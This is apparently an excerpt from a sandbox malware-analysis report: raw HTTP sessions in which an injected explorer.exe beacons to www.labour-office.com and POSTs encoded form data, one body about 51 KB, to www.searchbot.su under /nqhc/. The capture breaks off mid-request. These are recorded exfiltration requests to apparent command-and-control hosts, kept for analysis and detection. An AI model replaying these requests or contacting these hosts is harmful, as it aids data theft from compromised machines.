                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    55192.168.11.204988145.33.23.18380C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:32.237992048 CET1564OUTGET /nqhc/?r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.labour-office.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:23:32.373277903 CET1564INHTTP/1.1 404 Not Found
                                                                                                                                                                                    server: openresty/1.13.6.1
                                                                                                                                                                                    date: Mon, 21 Nov 2022 18:23:32 GMT
                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                    content-length: 175
                                                                                                                                                                                    connection: close
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    56192.168.11.204988245.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:37.441638947 CET1565OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.searchbot.su
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.searchbot.su
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 68 71 50 63 4a 53 4c 33 50 73 74 6f 61 70 61 52 76 30 4b 52 30 70 68 4f 30 4e 45 51 34 4a 4f 38 66 61 6b 44 33 38 6c 38 43 57 66 6c 75 35 6a 6c 28 76 75 52 30 4d 55 62 33 43 72 61 63 63 35 58 47 68 44 33 65 68 6c 39 56 44 66 49 4e 55 43 4b 72 47 31 57 32 69 75 4f 35 5a 45 50 73 61 36 4f 57 50 78 66 77 41 47 37 59 43 48 6a 55 6a 61 31 6d 53 66 35 6c 49 43 67 4f 61 77 36 78 46 32 51 34 7a 38 59 52 69 6d 61 73 4b 31 65 35 63 7a 55 61 56 4d 43 64 6e 5a 52 43 69 30 62 6d 38 39 56 54 50 64 57 56 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=9jZPDiqEJGn1hqPcJSL3PstoapaRv0KR0phO0NEQ4JO8fakD38l8CWflu5jl(vuR0MUb3Cracc5XGhD3ehl9VDfINUCKrG1W2iuO5ZEPsa6OWPxfwAG7YCHjUja1mSf5lICgOaw6xF2Q4z8YRimasK1e5czUaVMCdnZRCi0bm89VTPdWVg).
                                                                                                                                                                                    Nov 21, 2022 19:23:37.536923885 CET1566INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx-reuseport/1.21.1
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:37 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    57192.168.11.204988345.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:39.519861937 CET1567OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.searchbot.su
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.searchbot.su
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 77 35 58 63 4b 78 6a 33 4a 4d 74 72 55 4a 61 52 6c 55 4b 56 30 70 74 4f 30 50 6f 36 35 37 71 38 66 37 30 44 6d 49 4a 38 44 57 66 6c 32 4a 69 76 37 76 75 4b 30 4e 6f 54 33 48 4c 61 63 59 70 58 48 53 4c 33 4a 68 6c 2d 42 54 66 4a 49 55 43 61 36 57 31 51 32 69 79 6f 35 59 51 50 73 4f 4b 4f 45 36 74 66 36 78 47 36 63 69 48 6c 57 6a 61 79 73 79 66 4e 6c 49 47 6f 4f 61 34 4d 78 32 71 51 34 54 63 59 44 69 6d 5a 6d 36 31 6e 37 63 79 46 4c 58 45 49 59 45 5a 79 55 77 73 34 7e 75 46 42 56 4d 34 5a 58 66 38 5f 50 32 32 6b 56 4c 50 52 6e 55 35 48 4f 54 48 65 51 6c 35 65 59 4c 76 58 4b 36 62 30 55 50 55 46 6d 7a 65 36 4f 33 33 74 47 43 73 6e 56 48 73 30 6f 76 71 30 6c 6d 78 4b 5a 36 71 38 67 72 6d 37 58 6b 30 46 54 6d 6a 6b 77 79 59 61 39 55 6f 54 71 78 44 73 50 6d 71 46 47 79 5a 48 66 6d 30 76 51 72 44 42 61 52 4c 2d 52 6e 56 30 78 31 53 53 50 71 32 77 62 67 4c 44 53 2d 34 44 55 43 6a 66 69 4c 7a 44 78 45 34 55 7a 58 39 44 4a 71 47 48 4a 4d 37 78 62 44 68 77 54 61 57 59 61 41 6f 48 63 36 78 34 33 4c 7e 69 6d 59 7a 79 73 4e 45 70 6c 4c 6b 67 78 6f 4e 61 36 5f 62 65 71 33 31 6f 74 43 6b 78 65 75 32 69 6e 6d 78 69 6e 72 56 67 48 72 35 7a 34 70 74 6e 54 67 4a 45 6d 61 78 75 37 36 47 56 44 31 39 49 68 61 42 7a 5a 64 7a 58 6b 42 34 5a 7a 47 54 57 4b 76 79 5f 28 37 72 67 65 49 4a 62 44 78 42 51 77 72 46 72 50 7a 76 33 4d 31 46 4d 39 76 50 35 55 4f 69 76 79 2d 65 32 33 31 47 6d 44 46 4a 48 6b 6d 76 56 63 70 4a 46 71 4c 69 31 69 50 4a 76 45 36 53 74 4d 51 43 4e 72 69 38 5f 4e 79 56 6a 74 39 63 66 54 73 6f 57 64 68 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=9jZPDiqEJGn1w5XcKxj3JMtrUJaRlUKV0ptO0Po657q8f70DmIJ8DWfl2Jiv7vuK0NoT3HLacYpXHSL3Jhl-BTfJIUCa6W1Q2iyo5YQPsOKOE6tf6xG6ciHlWjaysyfNlIGoOa4Mx2qQ4TcYDimZm61n7cyFLXEIYEZyUws4~uFBVM4ZXf8_P22kVLPRnU5HOTHeQl5eYLvXK6b0UPUFmze6O33tGCsnVHs0ovq0lmxKZ6q8grm7Xk0FTmjkwyYa9UoTqxDsPmqFGyZHfm0vQrDBaRL-RnV0x1SSPq2wbgLDS-4DUCjfiLzDxE4UzX9DJqGHJM7xbDhwTaWYaAoHc6x43L~imYzysNEplLkgxoNa6_beq31otCkxeu2inmxinrVgHr5z4ptnTgJEmaxu76GVD19IhaBzZdzXkB4ZzGTWKvy_(7rgeIJbDxBQwrFrPzv3M1FM9vP5UOivy-e231GmDFJHkmvVcpJFqLi1iPJvE6StMQCNri8_NyVjt9cfTsoWdho.
                                                                                                                                                                                    Nov 21, 2022 19:23:39.612813950 CET1568INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx-reuseport/1.21.1
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:39 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    58192.168.11.204988445.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:41.597794056 CET1573OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.searchbot.su
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.searchbot.su
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 77 35 58 63 4b 78 6a 33 4a 4d 74 72 55 4a 61 52 6c 55 4b 56 30 70 74 4f 30 50 6f 36 35 37 69 38 66 4d 30 44 33 5a 4a 38 41 57 66 6c 37 70 69 75 37 76 75 48 30 4d 41 58 33 48 50 4b 63 61 68 58 48 44 62 33 4a 30 35 2d 52 44 65 75 52 55 43 4c 72 47 31 4d 32 69 75 47 35 59 45 66 73 65 57 4f 57 4e 70 66 77 69 75 37 65 79 48 6a 57 6a 61 6d 6f 79 66 46 6c 49 4c 7a 4f 61 30 4d 78 31 65 51 34 6c 51 59 51 44 6d 5a 67 71 31 67 77 38 7a 4c 53 6e 46 34 59 45 4e 4d 55 77 73 47 7e 76 42 42 56 50 77 5a 46 75 38 77 50 57 32 6b 59 72 50 53 6a 55 31 44 4f 54 61 44 51 6c 4e 65 59 49 76 58 4c 61 62 30 45 37 41 47 75 7a 65 38 59 48 33 36 43 43 6f 5f 56 48 6f 4b 6f 72 6d 30 6c 57 31 4b 59 4a 43 38 6a 50 79 37 51 30 30 4c 65 47 6a 37 6e 69 59 47 39 55 35 36 71 79 36 5a 50 6d 4f 46 48 54 35 48 61 43 59 6f 57 4c 44 44 45 42 4c 6e 44 58 5a 47 78 31 43 65 50 71 32 67 62 6a 48 44 54 4f 49 44 56 44 6a 63 6c 62 7a 45 38 6b 35 63 34 33 42 65 4a 71 61 66 4a 4d 69 71 62 41 4e 77 54 36 57 59 66 6a 41 45 4f 71 78 7a 6f 37 28 6c 6f 34 7a 6c 73 4e 59 31 6c 4b 77 57 77 5a 52 61 34 4f 72 65 74 6e 31 70 70 69 6b 31 48 2d 32 6b 6a 6d 78 69 6e 72 5a 4b 48 72 6c 7a 37 5a 6c 6e 4a 79 68 45 74 74 6c 75 39 36 47 54 44 31 39 6a 68 61 64 49 5a 64 37 70 6b 46 38 5f 7a 46 28 57 4b 65 69 5f 38 35 54 6e 61 34 4a 55 55 68 42 35 39 4b 35 47 50 31 4b 36 4d 31 55 37 7e 59 33 35 53 39 4b 76 6a 75 65 31 6c 46 47 72 45 46 49 45 67 6d 6a 67 63 71 38 79 71 4b 57 63 69 4a 70 76 55 75 44 51 4a 42 7a 61 78 6b 6f 6a 4e 79 46 52 6b 50 41 44 57 76 41 4c 4f 42 45 44 74 6f 44 65 4c 62 43 67 53 6c 71 6c 6b 4e 6f 37 67 44 57 43 70 49 77 36 49 51 6b 7a 68 75 43 61 33 5a 4b 6f 6c 68 4b 41 30 62 36 67 65 70 77 78 39 75 38 31 6a 4e 46 4c 6e 69 41 6c 39 47 57 52 4e 49 6b 4a 76 53 57 37 61 5f 43 52 48 58 79 65 79 55 42 66 38 5a 46 6f 54 67 70 4d 49 79 6f 76 50 4f 63 42 64 32 4f 42 6c 6b 4a 55 77 4a 66 70 59 59 49 6b 52 62 74 4a 53 7a 56 49 41 72 5a 4e 59 58 79 37 49 66 4c 71 32 42 36 66 48 41 59 41 37 70 56 6d 30 36 46 47 7a 79 55 41 75 58 34 4e 7e 35 63 61 30 49 4c 34 49 73 7a 4d 56 38 46 43 61 57 66 56 28 54 51 51 6d 58 6f 41 74 61 49 75 31 4f 44 4a 34 57 30 5f 6c 59 57 51 49 52 6d 69 4a 32 68 34 70 45 38 66 65 47 66 6d 4c 76 36 49 78 64 38 63 4a 71 74 4b 4e 73 6f 38 49 75 6f 66 6b 77 68 4e 4b 6c 7a 4d 32 58 6a 32 48 57 43 58 48 57 36 4d 64 75 6d 75 71 30 4b 64 7a 4f 70 43 73 37 45 4d 68 75 74 6f 61 57 68 57 70 4e 4e 35 62 47 70 71 7e 42 4d 56 52 35 4e 47 69 52 45 48 65 35 71 6f 6e 38 7e 59 55 67 53 50 61 62 37 47 4a 4a 34 61 67 47 64 66 78 75 6a 68 59 59 37 59 4a 78 52 38 46 35 42 72 5a 53 46 79 76 77 68 55 6a 6d 7a 6a 43 71 28 4a 30 65 57 67 4b 6c 71 69 58 46 41 74 69 79 28 75 78 63 31 31 4a 72 33 6e 54 61 75 61 68 58 74 53 62 30 4c 52 51 4b 4c 78 43 39 6f 37 28 59 6e 78 58 6f 74 64 52 38 71 33 62 63 67 62 72 42 6b 77 66 4e 79 59 56 6a 52 73 35 63 4f 55 50 59 75 58 46 58 7e 6d 57 41 6b 4a 6f 55 44 4f 61 68 38 4e 46 54 71 56 6b 45 5a 6f 73 5f 61 74 41 54 63 61 74 67 43 55 7e 30 51 37 55 51 55 4e 4e 35 6a 42 46 56 39 43 51 58 4d 6d 64 44 67 71 4d 37 59 32 43 53 6c 7a 49 73 42 62 36 61 54 79 4f 53 33 69 47 51 4c 71 6e 4b 63 4b 4a 51 73 45 4b 4f 4d 78 71 70 41 71 52 4b 45 77 30 77 77 79 39 65 64 74 4d 56 39 37 6e 51 30 52 53 41 43 7a 38 69 55 47 57 4d 36 67 58 79 32 4c 4c 69 66 69 51 70 61 6a 51 4c 37 5a 34 2d 6c 59 44 4a 37 31 63 79 45 68 5a 66 73 31 78 59 37 53 58 46 64 30 70 43 75 39 48 62 28 63 70 5f 65 42 53 57 47 68 55 63 6b 79 7e 6f 34 44 72 42 37 5a 73 64 50 36 67 38 6d 67 78 45 55 7a 79 57 4a 72 5a 56 79 77 6f 79 43 65 71 6b 6b 54 6b 4c 49 36 74 70 76 73 72 62 49 55 44 6f 4d 52 34 7a 69 6d 4b 58 37 33 54 78 73 5a 31 67 53 76 68 41 39 67 57 39 66 33 61 37 41 66 56 69 30 71 4b 54 70 39 39 56 4c 59 42 61 28 79 38 45 33 79 44 74 6d 39 6c 4f 49 56 71 77 6a 7a 73 79 32 4e 6d 58 55 4f 35 32 7a 58 6d 37 6f 6c 58 78 61 79 37 63 7e 34 42 76 32 6b 74 63 7e 75 6c 6d 54 30 55 33 30 77 72 66 38 31 59 50 37 64 53 4e 46 48 63 38 78 33 69 36 6f 56 33 4e 5a 31 63 63 51 54 52 44 62 53 78 52 61 59 38 33 79 42 71 76 7a 75 72 63 74 6f 6b 33 6c 77 47
                                                                                                                                                                                    Data Ascii: r4txB=9jZPDiqEJGn1w5XcKxj3JMtrUJaRlUKV0ptO0Po657i8fM0D3ZJ8AWfl7piu7vuH0MAX3HPKcahXHDb3J05-RDeuRUCLrG1M2iuG5YEfseWOWNpfwiu7eyHjWjamoyfFlILzOa0Mx1eQ4lQYQDmZgq1gw8zLSnF4YENMUwsG~vBBVPwZFu8wPW2kYrPSjU1DOTaDQlNeYIvXLab0E7AGuze8YH36CCo_VHoKorm0lW1KYJC8jPy7Q00LeGj7niYG9U56qy6ZPmOFHT5HaCYoWLDDEBLnDXZGx1CePq2gbjHDTOIDVDjclbzE8k5c43BeJqafJMiqbANwT6WYfjAEOqxzo7(lo4zlsNY1lKwWwZRa4Oretn1ppik1H-2kjmxinrZKHrlz7ZlnJyhEttlu96GTD19jhadIZd7pkF8_zF(WKei_85Tna4JUUhB59K5GP1K6M1U7~Y35S9Kvjue1lFGrEFIEgmjgcq8yqKWciJpvUuDQJBzaxkojNyFRkPADWvALOBEDtoDeLbCgSlqlkNo7gDWCpIw6IQkzhuCa3ZKolhKA0b6gepwx9u81jNFLniAl9GWRNIkJvSW7a_CRHXyeyUBf8ZFoTgpMIyovPOcBd2OBlkJUwJfpYYIkRbtJSzVIArZNYXy7IfLq2B6fHAYA7pVm06FGzyUAuX4N~5ca0IL4IszMV8FCaWfV(TQQmXoAtaIu1ODJ4W0_lYWQIRmiJ2h4pE8feGfmLv6Ixd8cJqtKNso8IuofkwhNKlzM2Xj2HWCXHW6Mdumuq0KdzOpCs7EMhutoaWhWpNN5bGpq~BMVR5NGiREHe5qon8~YUgSPab7GJJ4agGdfxujhYY7YJxR8F5BrZSFyvwhUjmzjCq(J0eWgKlqiXFAtiy(uxc11Jr3nTauahXtSb0LRQKLxC9o7(YnxXotdR8q3bcgbrBkwfNyYVjRs5cOUPYuXFX~mWAkJoUDOah8NFTqVkEZos_atATcatgCU~0Q7UQUNN5jBFV9CQXMmdDgqM7Y2CSlzIsBb6aTyOS3iGQLqnKcKJQsEKOMxqpAqRKEw0wwy9edtMV97nQ0RSACz8iUGWM6gXy2LLifiQpajQL7Z4-lYDJ71cyEhZfs1xY7SXFd0pCu9Hb(cp_eBSWGhUcky~o4DrB7ZsdP6g8mgxEUzyWJrZVywoyCeqkkTkLI6tpvsrbIUDoMR4zimKX73TxsZ1gSvhA9gW9f3a7AfVi0qKTp99VLYBa(y8E3yDtm9lOIVqwjzsy2NmXUO52zXm7olXxay7c~4Bv2ktc~ulmT0U30wrf81YP7dSNFHc8x3i6oV3NZ1ccQTRDbSxRaY83yBqvzurctok3lwG95fKmTPm6DlTA9LnSZrgriTgP2KdFcrFQXuceHTeHS-RAgAHBrrGY9b0oHbRmQeX_Eh(WAxo5wPV9QZibJLnSQsFjojJFt_bONv4HkFB4kV9KPyW0ITa7bSxtEC2x0lI3EXOC2-rQTWP9(j6XD4~wBwrvU8GuoqeuSi2dPQYb2vTSSPPrV082ZbpwvITyNygd9J9HBzOYAGi3MIGYnb2AsifutJmAOjgMq7yqnL0SBjZqVf36LsR03xY5es2TfAwthAj0AVggu-(AmAi9yUaOJNeQCOMIIEVbBTZNxekXKJ2mnNkZsdWKxxtIKT5OC2vdWMnfL_nuXVrOkznN8xtJxB7LLmg7HHlt4znkFAne5bKVMD9pR9KlkwQ-kZSQ8BUn(wIZ2vQQb89rJzb6yiv7AjAFXUrbtIBCbqpI4dsAXfhLEfgRgTMCu2YbOzHEjfA0wPgbs0Zv6bJBteoKw3G5Q3~yoXoG23yKZT~S4OtP8XgO8RGBgLkNoKcDRl57~kxOzaYoy0xJIPBpx89m99WiPvZ18zIrEdw4CkVtKe9DIvTp~fIdQ0W6954mbgDsvpdcslqtFoTa~L1fPD7Sba7F37U_m9ad6xMTRe0iGpXhHMeQMB4XVb7-(G5iczTpDiv1d3Wd3GZf(UoJO5Z8RKu-YkRs4xhLkqPqpfM3(czjMR~62v~45UYTLXu1Jha_O9Nv1nDWarY80G3CquqyT3(SFjS2in4aCqvdlGHCQ57fRm6UkXSWFRCdqPfHdXs1CTBeQEfd2n50KyxuuA(JfXMKAy80KAzjxxUunJitoMhv3KVx2kKCNSfqnX2wVGVErDRmW9S-aylu1Vj0hK3RsBYF8lka74hynj5v4FH2u_lAreR6yObugIjdoA28X5zA5ORUPW1wtm1EmNTn(ReZxuj9K2lG~xUyeEh5SaXDK-kGvGFNGuCuTDJTrz~XbePmtpRDpO(YzugoKRIjXjHQp0Z2i3EjMOzQ65Yf0Lm6CUq1m8olCqXSYec2u07O~1BECVJfmik2L57BmfgFY5QYJqWx1GNPr4f72MeKXZ0_iPjIXq117cuZKZsdKox66GjaX9aGYB11P4OWcyTgWY0aYgY4N-mR0MfHGin9pR9ZA3B-N_cybDIY8cIYUXaeJ-249iZxVDcmDfIFL4dJ3Mu4xkWtFTvOryZhAmKyAK~ktk1KRK8mOnti2YMBCwDvkw1tCSGQrNRA7VQtWL4GLmXuL8WNkiXrWfKfHRpkZpf5O8TmPt6QySzGt_j893HxJn2pwdfgpyyvULWwowYbumw27oMhNf2XNCbQOlhfMRqKPkg0MudKaTG_YVpw(1282LkjeCuOmWPK8mrN5vkqP7fv8IQwZ1MXDrdAn81LmRy8UOHyX0Gcn0CAezTA~b6HXqjBCwAPPhIsZOf6Ys8y4enx1H3lsLFq2mkKqf1rckZ-EnFkGh0w9XrBhDtEQ9cy3CjxuzilrSnhycfGJ2TgykUA2Op4vPPSiwS1bL5zCspZRenDHwrzvoel6VXBKsuVHXdN6l53513SEYoOn4NayUO3rqbQFyu8aNvGbq(_uj3pdcX311EwUpJF1toNdJ8oGDiQU2Q-Mo~QG-yZAt7neHevUyUcGmd_d8IucR~7GtjlG8bZDJbwer1ZY47-lHsTg_zwefBhy39nBifNXKM3jaV3XYfMnIT8TlKZI1w4Z53LtrBf8lP9tEsBPOGsDV6h(2BF5jmigkqD45UKElN0VlzXz7eVFRt_9wT1wSD3jqgLAPr2IlI8YiyNC6XIyNXEwnHCplFYrv9rMWOSTnmRXPZbfR1cE0Oq5lYxteMowlPn3XF7c7Y7849OjkZCCw9DZHqGmTD1h8SdCJX4OjM0Ee3CXEP1f54OEKtfKswr8mwcAWRHXI(oTFKnp8ru~MVrteQvg8~mLCTE49dD7jxcTkdMSEnbNgw7S4ZJ5LJJNkH-7JgKiz6Sc4x7UZkFUuQk7a8sl6fjcliR~W13SXGt07B59PnGdr6SIrJZ5qGfavCAAjdfts8aCjpJMy1CA777Kq4gZYAzwcy-39FII1Jf9ZEF6-HwBXcGQHwIldO3HtV4GuIkInn1Vac7(k3N3CqBNvDxS3HTAOH5M93lkzoqSkpLQfEsdWkXufo70qCiEbbP5RLpEjmQTwgvVimcFooysXVzjJ6woJg9TNbS3uWCj31FfTQnLORE(lrYcEDHOjyh6pd53UM5Ko9LvcRLAJIzOi3bHrLMVggpRrdzDz07UwvTUGkf1s3U82cJzOk9ntgdxo6rtakQKhiL9clNF3F1qT1no23Ehhorx7HK4tpzlnRm4QPZmnmFHfANjqEqlMTCBVhTDz(HlKHZpYHWsjEDxlG2TFjLf1aMF_I4ohZVhy3r53par7qra3UDS4NWHgD7(f~MWL7WqqE5PZwQYGGFsRzPTxldga4SaSbeZrlwXtnKBMIgzaEshfp1tkaTyVYIDPdWqCDp8zAiVfw-8ms4i-NjYaCmGSH7fV5a9_JUqHKDVakjpXmrFei_MtP10c0Uo0I-RB3SEtQNzMvF8UvE06GBVMA0EQ6OzCmkyPtJaCFvYQ2nuaERI9UHjy955cIY4UFtMCgFxZ2s9XTsCBPYXam677GfE9yHobJLgD5WiVqkzpWqs0fxpQOwulTgHC(64lbmcFu2bn9NOOHsO4JsAo7EnLDV68fqRy~qjq1EwrBRbk1Vp_l5wFBrYMzx9Z
                                                                                                                                                                                    Nov 21, 2022 19:23:41.597889900 CET1581OUTData Raw: 48 38 72 71 53 37 4b 6b 79 36 4f 41 48 57 68 4c 53 42 56 67 57 42 71 76 71 30 38 5f 66 57 48 64 54 38 73 4f 6f 4c 31 50 61 58 59 36 57 6b 35 2d 5a 37 31 58 6f 73 38 76 38 31 46 4b 48 61 38 48 41 5f 5a 5a 59 62 4d 4a 4d 44 52 71 41 4b 77 43 76 33
                                                                                                                                                                                    Data Ascii: H8rqS7Kky6OAHWhLSBVgWBqvq08_fWHdT8sOoL1PaXY6Wk5-Z71Xos8v81FKHa8HA_ZZYbMJMDRqAKwCv3TAiXfTJNMO5VX4PWPOo5cYvcXASU2mBVQJfdHQa3eEr-AzlxN4DC87~ynasTCfse1umPFaQv9ZKGjC7ewUzKWj5da9SIF4tqAMuDgpMKwIR52FrB5XlzYBhE21V_fInrUOgAr5Sa3Zi7xo02hhiomtYtGHnuaiWc5
                                                                                                                                                                                    Nov 21, 2022 19:23:41.656160116 CET1582OUTData Raw: 7e 53 6a 56 67 33 68 36 42 46 65 50 55 5f 32 70 43 44 4a 61 43 70 62 56 33 4c 42 70 4f 69 6b 4e 74 79 67 6e 35 37 51 69 37 67 74 31 55 61 67 43 52 49 71 6a 48 4b 4f 6b 4e 73 34 2d 4e 6c 49 51 51 36 6b 4e 6b 38 47 7a 64 5a 33 51 64 43 55 73 34 57
